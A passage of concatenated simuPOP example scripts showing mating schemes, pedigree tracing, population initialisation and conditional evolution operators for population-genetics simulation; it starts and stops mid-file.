gen=3\n)\n\n#end_file\n\n#begin_file log/sexMode.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef checkSexMode(ms):\n '''Check the assignment of sex to offspring'''\n pop = sim.Population(size=[40])\n pop.evolve(initOps=sim.InitSex(), matingScheme=ms, gen=1)\n # return individual sex as a string\n return ''.join(['M' if ind.sex() == sim.MALE else 'F' for ind in pop.individuals()])\n\n# Case 1: sim.NO_SEX (all male, sim.RandomMating will not continue)\ncheckSexMode(sim.RandomMating(sexMode=sim.NO_SEX))\n# Case 2: sim.RANDOM_SEX (sim.Male/Female with probability 0.5)\ncheckSexMode(sim.RandomMating(sexMode=sim.RANDOM_SEX))\n# Case 3: sim.PROB_OF_MALES (Specify probability of male)\ncheckSexMode(sim.RandomMating(sexMode=(sim.PROB_OF_MALES, 0.8)))\n# Case 4: sim.NUM_OF_MALES (Specify number of male in each family)\ncheckSexMode(sim.RandomMating(numOffspring=3, sexMode=(sim.NUM_OF_MALES, 1)))\n# Case 5: sim.NUM_OF_FEMALES (Specify number of female in each family)\ncheckSexMode(sim.RandomMating(\n numOffspring=(sim.UNIFORM_DISTRIBUTION, 4, 6),\n sexMode=(sim.NUM_OF_FEMALES, 2))\n)\n# Case 6: sim.SEQUENCE_OF_SEX\ncheckSexMode(sim.RandomMating(\n numOffspring=4, sexMode=(sim.SEQUENCE_OF_SEX, sim.MALE, sim.FEMALE))\n)\n# Case 7: sim.GLOBAL_SEQUENCE_OF_SEX\ncheckSexMode(sim.RandomMating(\n numOffspring=3, sexMode=(sim.GLOBAL_SEQUENCE_OF_SEX, sim.MALE, sim.FEMALE))\n)\n# Case 8: A generator function\ndef sexFunc():\n i = 0\n while True:\n i += 1\n if i % 2 == 0:\n yield sim.MALE\n else:\n yield sim.FEMALE\n\ncheckSexMode(sim.RandomMating(numOffspring=3, sexMode=sexFunc))\n#end_file\n\n#begin_file log/monogamous.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(20, infoFields=['father_idx', 'mother_idx'])\npop.evolve(\n initOps=sim.InitSex(sex=(sim.MALE, sim.FEMALE)),\n matingScheme=sim.MonogamousMating(\n numOffspring=2,\n sexMode=(sim.NUM_OF_MALES, 1),\n ops=[\n sim.MendelianGenoTransmitter(),\n sim.ParentsTagger(),\n ],\n ),\n gen = 5\n)\n[ind.sex() for ind in pop.individuals()]\n[int(ind.father_idx) for ind in pop.individuals()]\n[int(ind.mother_idx) for ind in pop.individuals()]\n# count the number of distinct parents\nlen(set(pop.indInfo('father_idx')))\nlen(set(pop.indInfo('mother_idx')))\n#end_file\n\n#begin_file log/polygamous.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, infoFields=['father_idx', 'mother_idx'])\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.PolygamousMating(polySex=sim.MALE, polyNum=2,\n ops=[sim.ParentsTagger(),\n sim.MendelianGenoTransmitter()],\n ),\n gen = 5\n)\n[int(ind.father_idx) for ind in pop.individuals()][:20]\n[int(ind.mother_idx) for ind in pop.individuals()][:20]\n#end_file\n\n#begin_file log/RandomSelection.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, ploidy=1, loci=[5, 5], ancGen=1,\n infoFields='parent_idx')\npop.evolve(\n initOps=sim.InitGenotype(freq=[0.3, 0.7]),\n matingScheme=sim.RandomSelection(ops=[\n sim.ParentsTagger(infoFields='parent_idx'),\n sim.CloneGenoTransmitter(),\n ]),\n gen = 5\n)\nind = pop.individual(0)\npar = pop.ancestor(ind.parent_idx, 1)\nprint(ind.sex(), ind.genotype())\nprint(par.sex(), par.genotype())\n#end_file\n\n\n#begin_file log/HaplodiploidMating.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10, ploidy=sim.HAPLODIPLOID, loci=[5, 5],\n infoFields=['father_idx', 'mother_idx'])\npop.setVirtualSplitter(sim.SexSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[0]*10, subPops=[(0, 'Male')]),\n sim.InitGenotype(genotype=[1]*10+[2]*10, subPops=[(0, 'Female')])\n ],\n preOps=sim.Dumper(structure=False),\n matingScheme=sim.HaplodiploidMating(\n ops=[sim.HaplodiploidGenoTransmitter(), sim.ParentsTagger()]),\n postOps=sim.Dumper(structure=False),\n gen = 1\n)\n#end_file\n\n#begin_file log/SelfMating.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(20, loci=8)\n# every chromosomes are different. :-)\nfor idx, ind in enumerate(pop.individuals()):\n ind.setGenotype([idx*2], 0)\n ind.setGenotype([idx*2+1], 1)\n\npop.evolve(\n matingScheme=sim.SelfMating(ops=sim.Recombinator(rates=0.01)),\n gen = 1\n)\nsim.dump(pop, width=3, structure=False, max=10)\n#end_file\n\n#begin_file log/HeteroMatingSP.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000, 1000], loci=2,\n infoFields=['father_idx', 'mother_idx'])\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.HeteroMating([\n sim.RandomMating(numOffspring=2, subPops=0,\n ops=[sim.MendelianGenoTransmitter(), sim.ParentsTagger()]\n ),\n sim.RandomMating(numOffspring=4, subPops=1,\n ops=[sim.MendelianGenoTransmitter(), sim.ParentsTagger()]\n )\n ]),\n gen=10\n)\n[int(ind.father_idx) for ind in pop.individuals(0)][:10]\n[int(ind.father_idx) for ind in pop.individuals(1)][:10]\n#end_file\n\n#begin_file log/HeteroMatingVSP.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000], loci=2,\n infoFields=['father_idx', 'mother_idx'])\npop.setVirtualSplitter(sim.ProportionSplitter([0.2, 0.8]))\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.HeteroMating(matingSchemes=[\n sim.SelfMating(subPops=[(0, 0)],\n ops=[sim.SelfingGenoTransmitter(), sim.ParentsTagger()]\n ),\n sim.RandomMating(subPops=[(0, 1)],\n ops=[sim.SelfingGenoTransmitter(), sim.ParentsTagger()]\n )\n ]),\n gen = 10\n)\n[int(ind.father_idx) for ind in pop.individuals(0)][:15]\n[int(ind.mother_idx) for ind in pop.individuals(0)][:15]\n#end_file\n\n#begin_file log/HeteroMatingWeight.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000], loci=2,\n infoFields='mark')\npop.setVirtualSplitter(sim.RangeSplitter([[0, 500], [200, 1000]]))\n\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.HeteroMating([\n sim.RandomMating(subPops=0, weight=-0.5,\n ops=[sim.InfoExec('mark=0'), sim.MendelianGenoTransmitter()]),\n sim.RandomMating(subPops=[(0, 0)], weight=2,\n ops=[sim.InfoExec('mark=1'), sim.MendelianGenoTransmitter()]),\n sim.RandomMating(subPops=[(0, 1)], weight=3,\n ops=[sim.InfoExec('mark=2'), sim.MendelianGenoTransmitter()])\n ]),\n gen = 10\n)\nmarks = list(pop.indInfo('mark'))\nmarks.count(0.)\nmarks.count(1.)\nmarks.count(2.)\n#end_file\n#begin_file log/Simulator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=10)\n# five copies of the same population\nsimu = sim.Simulator(pop, rep=5)\nsimu.numRep()\n# evolve for ten generations and save the populations\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.3, 0.7])\n ],\n matingScheme=sim.RandomMating(),\n finalOps=sim.SavePopulation('!\"pop%d.pop\"%rep'),\n gen=10\n)\n# load the population and create another Simulator\nsimu = sim.Simulator([sim.loadPopulation('pop%d.pop' % x) for x in range(5)])\n# continue to evolve\nsimu.evolve(\n matingScheme=sim.RandomMating(),\n gen=10\n)\n# print out allele frequency\nfor pop in simu.populations():\n sim.stat(pop, alleleFreq=0)\n print('%.2f' % pop.dvars().alleleFreq[0][0])\n\n# get a population\npop = simu.extract(0)\nsimu.numRep()\n#begin_ignore\nimport os\nfor x in range(5):\n os.remove('pop%d.pop' % x)\n\n#end_ignore\n#end_file\n\n\n\n#begin_file log/matingSchemeByRepAndGen.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(1000, loci=[10]), rep=3)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.ConditionalMating('rep == 0', \n # the first replicate use standard random mating\n sim.RandomMating(),\n sim.ConditionalMating('rep == 1 and gen >= 5',\n # the second replicate produces more males for the first 5 generations\n sim.RandomMating(),\n # the last replicate produces more males all the time\n sim.RandomMating(sexMode=(sim.PROB_OF_MALES, 0.7))\n )\n ),\n postOps=[\n sim.Stat(numOfMales=True),\n sim.PyEval(\"'gen=%d' % gen\", reps=0),\n sim.PyEval(r\"'\\t%d' % numOfMales\"),\n sim.PyOutput('\\n', reps=-1)\n ], \n gen=10\n)\n#end_file\n\n#begin_file log/matingSchemeByFunc.py\n#begin_ignore\n\n#end_file\n\n#begin_file log/simuGen.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(50, loci=[10], ploidy=1),\n rep=3)\nsimu.evolve(gen = 5)\nsimu.dvars(0).gen\nsimu.evolve(\n initOps=[sim.InitGenotype(freq=[0.5, 0.5])],\n matingScheme=sim.RandomSelection(),\n postOps=[\n sim.Stat(alleleFreq=5),\n sim.IfElse('alleleNum[5][0] == 0',\n sim.PyEval(r\"'Allele 0 is lost in rep %d at gen %d\\n' % (rep, gen)\")),\n sim.IfElse('alleleNum[5][0] == 50',\n sim.PyEval(r\"'Allele 0 is fixed in rep %d at gen %d\\n' % (rep, gen)\")),\n sim.TerminateIf('len(alleleNum[5]) == 1'),\n ],\n)\n[simu.dvars(x).gen for x in range(3)]\n#end_file\n\n#begin_file log/describe.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n\ndef outputstat(pop):\n 'Calculate and output statistics, ignored'\n return True\n\n# describe this evolutionary process\nprint(sim.describeEvolProcess(\n initOps=[\n sim.InitSex(),\n sim.InitInfo(lambda: random.randint(0, 75), infoFields='age'),\n sim.InitGenotype(freq=[0.5, 0.5]),\n sim.IdTagger(),\n sim.PyOutput('Prevalence of disease in each age group:\\n'),\n ],\n preOps=sim.InfoExec('age += 1'),\n matingScheme=sim.HeteroMating([\n sim.CloneMating(subPops=[(0,0), (0,1), (0,2)], weight=-1),\n sim.RandomMating(ops=[\n sim.IdTagger(),\n sim.Recombinator(intensity=1e-4)\n ], subPops=[(0,1)]),\n ]),\n postOps=[\n sim.MaPenetrance(loci=0, penetrance=[0.01, 0.1, 0.3]),\n sim.PyOperator(func=outputstat)\n ],\n gen = 100,\n numRep = 3\n)) \n#end_file\n\n#begin_file log/twoStage.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n# First stage: use the standard random mating scheme, do not use any\n# information field for efficiency considerations.\npop = sim.Population(500, loci=[10])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(),\n gen = 50\n)\n# Second stage: track parents and produce more offspring per mating\n# event. In preparation for sim.Pedigree ascertainment.\npop.addInfoFields(['ind_id', 'father_id', 'mother_id'])\npop.setAncestralDepth(1)\npop.evolve(\n initOps=sim.IdTagger(),\n matingScheme=sim.RandomMating(numOffspring=2, ops=[\n sim.IdTagger(),\n sim.PedigreeTagger(),\n sim.MendelianGenoTransmitter(),\n ]),\n postOps=sim.MaPenetrance(loci=0, penetrance=(0.2, 0.4, 0.5)),\n gen = 5\n)\n# Sample affected sibpairs\nfrom simuPOP.sampling import drawAffectedSibpairSample\nsample = drawAffectedSibpairSample(pop, families=5)\n[int(ind.father_id) for ind in sample.individuals()]\n#end_file\n\n\n#begin_file log/locateRelative.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, ancGen=2, infoFields=['ind_id', 'father_id', 'mother_id'])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.IdTagger(),\n ],\n matingScheme=sim.RandomMating(\n numOffspring=(sim.UNIFORM_DISTRIBUTION, 2, 4),\n ops=[\n sim.MendelianGenoTransmitter(),\n sim.IdTagger(),\n sim.PedigreeTagger()\n ],\n ),\n gen = 5\n)\nped = sim.Pedigree(pop)\noffFields = ['off%d' % x for x in range(4)]\ngrandOffFields = ['grandOff%d' % x for x in range(5)]\nped.addInfoFields(['spouse'] + offFields + grandOffFields)\n# only look spouse for fathers...\nped.locateRelatives(sim.OUTBRED_SPOUSE, ['spouse'], sex=sim.FEMALE_ONLY)\nped.locateRelatives(sim.COMMON_OFFSPRING, ['spouse'] + offFields)\n# trace offspring of offspring\nped.traceRelatives([offFields, offFields], resultFields=grandOffFields)\n# \nIDs = ped.individualsWithRelatives(grandOffFields)\n# check on ID.\ngrandFather = IDs[0]\ngrandMother = ped.indByID(grandFather).spouse\n# some ID might be invalid.\nchildren = [ped.indByID(grandFather).info(x) for x in offFields]\nchildrenSpouse = [ped.indByID(x).spouse for x in children if x >= 1]\nchildrenParents = [ped.indByID(x).father_id for x in children if x >= 1] \\\n + [ped.indByID(x).mother_id for x in children if x >= 1]\ngrandChildren = [ped.indByID(grandFather).info(x) for x in grandOffFields]\ngrandChildrenParents = [ped.indByID(x).father_id for x in grandChildren if x >= 1] \\\n + [ped.indByID(x).mother_id for x in grandChildren if x >= 1]\n\ndef idString(IDs):\n uniqueIDs = list(set(IDs))\n uniqueIDs.sort()\n return ', '.join(['%d' % x for x in uniqueIDs if x >= 1])\n\nprint('''GrandParents: %d, %d\nChildren: %s\nSpouses of children: %s\nParents of children: %s\nGrandChildren: %s\nParents of grandChildren: %s ''' % \\\n(grandFather, grandMother, idString(children), idString(childrenSpouse),\n idString(childrenParents), idString(grandChildren), idString(grandChildrenParents)))\n\n# let us look at the structure of this complete pedigree using another method\nfamSz = ped.identifyFamilies()\n# it is amazing that there is a huge family that connects almost everyone\nlen(famSz), max(famSz)\n# if we only look at the last two generations, things are much better\nped.addInfoFields('ped_id')\nfamSz = ped.identifyFamilies(pedField='ped_id', ancGens=[0,1])\nlen(famSz), max(famSz)\n#end_file\n\n\n\n#begin_file log/locateFamilies.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, ancGen=-1, infoFields=['ind_id', 'father_id', 'mother_id'])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.IdTagger(),\n ],\n matingScheme=sim.RandomMating(\n numOffspring=(sim.UNIFORM_DISTRIBUTION, 2, 4),\n ops=[\n sim.MendelianGenoTransmitter(),\n sim.IdTagger(),\n sim.PedigreeTagger()\n ],\n ),\n gen = 19\n)\n# we now have the complete pedigree of 20 generations\npop.asPedigree()\n# total number of individuals should be 20 * 1000\n# how many families do we have?\nfam = pop.identifyFamilies()\nlen(fam)\n# but how many families with more than 1 individual?\n# The rest of them must be in the initial generation\nlen([x for x in fam if x > 1])\n# let us look backward. allAnc are the ancestors who have offspring in the\n# last generation. You can see this is a small number compared the number of\n# ancestors.\nallAnc = pop.identifyAncestors()\nlen(allAnc)\n#end_file\n\n\n#begin_file log/saveLoadPedigree.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(4, loci=1, infoFields=['ind_id', 'father_id', 'mother_id'],\n ancGen=-1)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.IdTagger(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n sim.PedigreeTagger(output='>>pedigree.ped', outputLoci=0)\n ],\n matingScheme=sim.RandomMating(\n ops=[\n sim.MendelianGenoTransmitter(),\n sim.IdTagger(),\n sim.PedigreeTagger(output='>>pedigree.ped', outputLoci=0)\n ],\n ),\n gen = 2\n)\n#\nprint(open('pedigree.ped').read())\npop.asPedigree()\npop.save('pedigree1.ped', loci=0)\nprint(open('pedigree1.ped').read())\n# \nped = sim.loadPedigree('pedigree1.ped')\nsim.dump(ped, ancGens=range(3))\n#begin_ignore\nimport os\nos.remove('pedigree.ped')\n#end_file\n\n\n\n#begin_file log/InitSex.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000, 1000])\nsim.initSex(pop, maleFreq=0.3, subPops=0)\nsim.initSex(pop, sex=[sim.MALE, sim.FEMALE, sim.FEMALE], subPops=1)\nsim.stat(pop, numOfMales=True, vars='numOfMales_sp')\nprint(pop.dvars(0).numOfMales)\nprint(pop.dvars(1).numOfMales)\n#end_file\n\n#begin_file log/InitGenotype.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2000, 3000], loci=[5, 7])\n# by allele frequency\ndef printFreq(pop, loci):\n sim.stat(pop, alleleFreq=loci)\n print(', '.join(['{:.3f}'.format(pop.dvars().alleleFreq[x][0]) for x in loci]))\n\nsim.initGenotype(pop, freq=[.4, .6])\nsim.dump(pop, max=6, structure=False)\nprintFreq(pop, range(5))\n# by proportion\nsim.initGenotype(pop, prop=[0.4, 0.6])\nprintFreq(pop, range(5))\n# by haplotype frequency\nsim.initGenotype(pop, freq=[.4, .6], haplotypes=[[1, 1, 0, 1], [0, 0, 1]])\nsim.dump(pop, max=6, structure=False)\nprintFreq(pop, range(5))\n# by haplotype proportion\nsim.initGenotype(pop, prop=[0.4, 0.6], haplotypes=[[1, 1, 0], [0, 0, 1, 1]])\nprintFreq(pop, range(5))\n# by genotype\npop = sim.Population(size=[2, 3], loci=[5, 7])\nsim.initGenotype(pop, genotype=[1]*5 + [2]*7 + [3]*5 +[4]*7)\nsim.dump(pop, structure=False)\n# \n# use virtual subpopulation\npop = sim.Population(size=[2000, 3000], loci=[5, 7])\npop.setVirtualSplitter(sim.SexSplitter())\nsim.initSex(pop)\nsim.initGenotype(pop, genotype=range(10), loci=range(5))\n# initialize all males\nsim.initGenotype(pop, genotype=[2]*7, loci=range(5, 12),\n subPops=[(0, 0), (1, 0)])\n# assign genotype by proportions\npop.setVirtualSplitter(sim.ProportionSplitter([0.4, 0.6]))\nsim.initGenotype(pop, freq=[0.2, 0.8], subPops=[(0,0)])\nsim.initGenotype(pop, freq=[0.5, 0.5], subPops=[(0,1)])\n#\n# initialize by random allele frequency\nimport random\nsim.initGenotype(pop, freq=lambda : random.random())\nprintFreq(pop, range(5))\n# initialize with loci specific frequency. here\n# lambda loc: 0.01*loc is equivalent to \n# lambda loc: [0.01*loc, 1-0.01*loc]\nsim.initGenotype(pop,\n freq=lambda loc: 0.01*loc)\nprintFreq(pop, range(5))\n# initialize with VSP-specific frequency\nsim.initGenotype(pop,\n freq=lambda vsp: [[0.2, 0.8], [0.5, 0.5]][vsp[1]],\n subPops=[(0, 0), (0, 1)])\n\n#end_file\n\n#begin_file log/InitInfo.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=[5], loci=[2], infoFields=['sex', 'age'])\npop.setVirtualSplitter(sim.SexSplitter())\nsim.initSex(pop)\nsim.initInfo(pop, 0, subPops=[(0,0)], infoFields='sex')\nsim.initInfo(pop, 1, subPops=[(0,1)], infoFields='sex')\nsim.initInfo(pop, lambda: random.randint(20, 70), infoFields='age')\nsim.dump(pop, structure=False)\n#end_file\n\n#begin_file log/Dumper.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[10, 10], loci=[20, 30], infoFields='gen',\n ancGen=-1)\nsim.initSex(pop)\npop.setVirtualSplitter(sim.SexSplitter())\npop1 = pop.clone()\nsim.initGenotype(pop, freq=[0]*20 + [0.1]*10)\npop.setIndInfo(1, 'gen')\nsim.initGenotype(pop1, freq=[0]*50 + [0.1]*10)\npop1.setIndInfo(2, 'gen')\npop.push(pop1)\nsim.dump(pop, width=3, loci=[5, 6, 30], subPops=([0, 0], [1, 1]),\n max=10, structure=False)\n# list all male individuals in all subpopulations\nsim.dump(pop, width=3, loci=[5, 6, 30], subPops=[(sim.ALL_AVAIL, 0)],\n max=10, structure=False)\n#end_file\n\n#begin_file log/SavePopulation.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(100, loci=2),\n rep=5)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.2, 0.8])\n ],\n matingScheme=sim.RandomMating(),\n postOps=sim.SavePopulation(output=\"!'snapshot_%d_%d.pop' % (rep, gen)\",\n step = 10),\n gen = 50\n)\n#begin_ignore\nimport os\nfor rep in range(5):\n for gen in range(0, 50, 10):\n os.remove('snapshot_%d_%d.pop' % (rep, gen))\n\n#end_ignore\n#end_file\n\n\n#begin_file log/IfElseFixed.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=1000, loci=1)\nverbose = True\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n matingScheme=sim.RandomMating(),\n postOps=sim.IfElse(verbose,\n ifOps=[\n sim.Stat(alleleFreq=0),\n sim.PyEval(r\"'Gen: %3d, allele freq: %.3f\\n' % (gen, alleleFreq[0][1])\",\n step=5)\n ],\n begin=10),\n gen = 30\n)\n#end_file\n\n\n#begin_file log/IfElse.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(\n sim.Population(size=1000, loci=1),\n rep=4)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n sim.PyExec('below40, above60 = 0, 0')\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.IfElse('alleleFreq[0][1] < 0.4',\n sim.PyExec('below40 += 1')),\n sim.IfElse('alleleFreq[0][1] > 0.6',\n sim.PyExec('above60 += 1')),\n sim.IfElse('len(alleleFreq[0]) == 1',\n sim.PyExec('stoppedAt = gen')),\n sim.TerminateIf('len(alleleFreq[0]) == 1')\n ]\n)\nfor pop in simu.populations():\n print('Overall: %4d, below 40%%: %4d, above 60%%: %4d' % \\\n (pop.dvars().stoppedAt, pop.dvars().below40, pop.dvars().above60))\n\n#end_file\n\n#begin_file log/TerminateIf.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(\n sim.Population(size=100, loci=1),\n rep=10)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.TerminateIf('len(alleleFreq[0]) == 1', stopAll=True)\n ]\n)\n\n#end_file\n\n\n#begin_file log/RevertToSaved.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=1234)\n#end_ignore\n\npop = sim.Population(1000, loci=1)\nevolved = pop.evolve(\n initOps=sim.InitSex(),\n preOps=[\n sim.SavePopulation('init.pop', at=4),\n sim.RevertIf('alleleFreq[0][1] == 0', \"init.pop\", begin=5),\n sim.PointMutator(at=4, inds=0, allele=1, loci=0),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.PyEval(r\"'%d %.4f\\n' % (gen, alleleFreq[0][1])\"),\n ],\n gen=20\n)\nprint('Evolved {} generations'.format(evolved))\n#end_file\n\n\n#begin_file log/DiscardIf.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=500, loci=1)\npop.setVirtualSplitter(sim.ProductSplitter([\n sim.AffectionSplitter(),\n sim.RangeSplitter([[0,500], [500, 1000]]),\n ])\n)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n matingScheme=sim.RandomMating(\n ops=[\n sim.MendelianGenoTransmitter(),\n sim.MaPenetrance(loci=0, penetrance=[0, 0.01, 0.1]),\n sim.DiscardIf(True, subPops=[\n (0, 'Unaffected, Range [0, 500)'),\n (0, 'Affected, Range [500, 1000)')])\n ],\n subPopSize=1000,\n ),\n gen = 1\n)\nsim.stat(pop, numOfAffected=True)\nprint(pop.dvars().numOfAffected, pop.dvars().numOfUnaffected)\n#end_file\n\n\n\n#begin_file log/Pause.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(100), rep=10)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[sim.Pause(stopOnKeyStroke=str(x), reps=x) for x in range(10)],\n gen = 100\n)\n#end_file\n\n#begin_file log/TicToc.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(10000, loci=[100]*5), rep=2)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.1, 0.9])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.TicToc(step=50, reps=-1),\n ],\n gen = 101\n)\n#end_file\n\n#begin_file log/PyExec.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(100, loci=1),\n rep=2)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.2, 0.8]),\n sim.PyExec('traj=[]')\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.PyExec('traj.append(alleleFreq[0][1])'),\n ],\n gen=5\n)\n# print Trajectory\nprint(', '.join(['%.3f' % x for x in simu.dvars(0).traj]))\n#end_file\n\n#begin_file log/PyEval.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=1,\n infoFields=['mother_idx', 'father_idx'])\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.ParentsTagger(),\n ]),\n postOps=[\n 